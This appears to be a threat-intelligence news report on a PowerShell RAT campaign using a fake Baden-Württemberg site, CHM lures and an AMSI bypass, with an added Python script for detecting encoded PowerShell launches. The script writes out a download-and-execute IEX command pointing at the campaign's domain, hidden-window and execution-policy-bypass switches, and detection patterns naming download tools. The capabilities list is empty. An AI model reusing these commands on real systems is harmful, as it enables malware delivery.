Researchers have identified an unknown threat actor targeting German users interested in the Ukraine crisis and infecting them with a bespoke PowerShell RAT. The campaign uses a decoy website that lures visitors with supposed news bulletins about the crisis. The site serves malicious documents that install a remote access trojan (RAT) capable of remote command execution and file operations.
The actors behind the campaign stood up a fake site on an expired German domain, collaboration-bw[.]de, posing as a Baden-Württemberg government site. It offered a bait document named “2022-Q2-Bedrohungslage-Ukraine” (“2022 Q2 threat situation: Ukraine”) that was used to deploy the custom malware. The document purports to contain information on the current crisis in Ukraine, and the download page claims it holds critical information about the present threat posed by the situation. When the victim clicks the link, a ZIP archive is downloaded to their machine. The archive contains a CHM file, a compiled HTML Help file. When the victim opens it, an error message is displayed while PowerShell silently executes a Base64-encoded command in the background.
Once de-obfuscated, the command uses Invoke-Expression (IEX) to run a script fetched from the bogus Baden-Württemberg website. That script then drops two files on the machine: a batch script named MonitorHealth.cmd and a PowerShell script saved as Status.txt. The .cmd file launches Status.txt through PowerShell; the .txt extension keeps the payload from looking like a script at first glance.
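The chain described above (a Base64-encoded PowerShell command launched from the CHM, which decodes to an IEX download from the decoy domain) is something a detection engineer can triage directly from process-creation logs. The following Python is an added example, not code from the report or from the campaign: it encodes a constructed stage-one command the way powershell.exe -EncodedCommand expects (UTF-16LE, then Base64), decodes such arguments back out of sample log lines constructed here, and flags the download-and-execute pattern together with the hidden-window and execution-policy switches that usually accompany it. The URL path, the exact invocations and the log format are assumptions; only the decoy domain and the dropped file names come from the article.

```python
"""Decode and triage Base64-encoded PowerShell launches from process-creation logs.

Added example, not code from the report or from the campaign itself. The log
lines, the stage-one command text, the URL path and the second-stage invocation
are constructed for illustration; only the decoy domain and the file names
MonitorHealth.cmd / Status.txt come from the article.
"""
import base64
import binascii
import re
from typing import Optional

# Constructed stage-one command modelled on the pattern the article describes
# (IEX of a script fetched from the decoy domain). The path is an assumption.
STAGE1_PLAINTEXT = (
    "IEX (New-Object Net.WebClient).DownloadString("
    "'https://collaboration-bw[.]de/update/status.ps1')"
)


def encode_for_powershell(command: str) -> str:
    """Encode as powershell.exe -EncodedCommand expects: UTF-16LE, then Base64."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"

# Constructed sample log lines in a simplified 'Key: value | Key: value' layout.
SAMPLE_LOGS = [
    # Ordinary administrative use, nothing encoded.
    f"ParentImage: C:\\Windows\\explorer.exe | Image: {PS} | CommandLine: powershell.exe -NoProfile -Command Get-Service",
    # CHM-launched stage: hh.exe (the HTML Help viewer) spawns a hidden PowerShell with an encoded payload.
    f"ParentImage: C:\\Windows\\hh.exe | Image: {PS} | CommandLine: powershell.exe -w hidden -nop -ep bypass -enc " +
    encode_for_powershell(STAGE1_PLAINTEXT),
    # Encoded but benign: an admin ran an encoded Get-Date.
    f"ParentImage: C:\\Windows\\System32\\cmd.exe | Image: {PS} | CommandLine: powershell.exe -EncodedCommand " +
    encode_for_powershell("Get-Date"),
    # Second stage: MonitorHealth.cmd hands Status.txt to PowerShell (this exact invocation is assumed).
    f"ParentImage: C:\\Windows\\System32\\cmd.exe | Image: {PS} | CommandLine: powershell.exe -ExecutionPolicy Bypass -Command \"IEX (Get-Content -Raw Status.txt)\"",
]

# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).
# -ep / -ExecutionPolicy do not match because the character after -e must be c, n or whitespace.
ENCODED_ARG = re.compile(r"(?i)(?:^|\s)-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/]+=*)")

# Indicators checked against both the outer command line and the decoded payload.
SUSPICIOUS = {
    "invoke-expression": re.compile(r"(?i)\b(?:iex|invoke-expression)\b"),
    "web-download": re.compile(
        r"(?i)downloadstring|downloadfile|net\.webclient|invoke-webrequest|"
        r"invoke-restmethod|\biwr\b|\bcurl\b|\bwget\b|start-bitstransfer"
    ),
    "hidden-window": re.compile(r"(?i)-w(?:i[a-z]*)?\s+hidden"),
    "policy-bypass": re.compile(r"(?i)-e(?:p|xecutionpolicy)\s+bypass"),
    "no-profile": re.compile(r"(?i)-nop(?:rofile)?\b"),
}


def decode_encoded_command(b64: str) -> Optional[str]:
    """Decode an -EncodedCommand argument; None if it is not Base64 of UTF-16LE text."""
    try:
        raw = base64.b64decode(b64 + "=" * (-len(b64) % 4), validate=True)
        return raw.decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def parse_log_line(line: str) -> dict:
    """Parse the constructed 'Key: value | Key: value' layout into a dict."""
    fields = {}
    for part in line.split(" | "):
        key, _, value = part.partition(": ")
        fields[key.strip()] = value.strip()
    return fields


def triage(cmdline: str) -> dict:
    """Decode any encoded payload and collect indicators from command line and payload."""
    result = {"encoded": False, "decoded": None, "flags": []}
    texts = [cmdline]
    match = ENCODED_ARG.search(cmdline)
    if match:
        result["encoded"] = True
        decoded = decode_encoded_command(match.group(1))
        result["decoded"] = decoded
        if decoded is None:
            result["flags"].append("undecodable-encodedcommand")
        else:
            texts.append(decoded)
    for name, pattern in SUSPICIOUS.items():
        if any(pattern.search(t) for t in texts):
            result["flags"].append(name)
    if {"invoke-expression", "web-download"} <= set(result["flags"]):
        result["flags"].append("download-and-execute")
    return result


def scan(lines: list) -> list:
    """Triage every log line; return records with their flags, most suspicious first."""
    findings = []
    for line in lines:
        fields = parse_log_line(line)
        record = triage(fields.get("CommandLine", ""))
        record["parent"] = fields.get("ParentImage", "")
        # HTML Help files have no legitimate reason to spawn a shell.
        if record["parent"].lower().endswith("\\hh.exe"):
            record["flags"].append("chm-parent")
        findings.append(record)
    findings.sort(key=lambda r: len(r["flags"]), reverse=True)
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOGS):
        print(f"{f['parent']:<40} flags={f['flags']}")
        if f["decoded"]:
            print(f"    decoded: {f['decoded']}")
```

PowerShell decodes -EncodedCommand as UTF-16LE, so a decoder that assumes UTF-8 sees interleaved NUL bytes and misses every keyword; decoding before pattern matching also means obfuscation on the outer command line (prefix aliases such as -enc, case changes) does not hide the IEX and DownloadString calls. An encoded command on its own is not malicious, as the Get-Date sample shows, which is why the combination of flags, and hh.exe as the parent of powershell.exe, carries the signal.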
The malicious logic of the custom PowerShell RAT hidden in Status.txt begins by collecting basic system information and assigning the victim a unique client ID.
That system data is sent to the domain kleinm[.]de. The RAT also evades Windows AMSI (Antimalware Scan Interface), the hook that lets installed antivirus inspect script content at run time, using an AES-encrypted function named “bypass”; keeping the bypass routine encrypted until it is needed hides its code from static inspection of the script.
The following are the RAT’s key capabilities:
A Russian threat actor is suspected of being behind the targeting of German users, although there are no obvious infrastructure links or overlaps with known TTPs. “Attributing this conduct to a single actor is difficult, and there are no solid indicators to support the attribution.”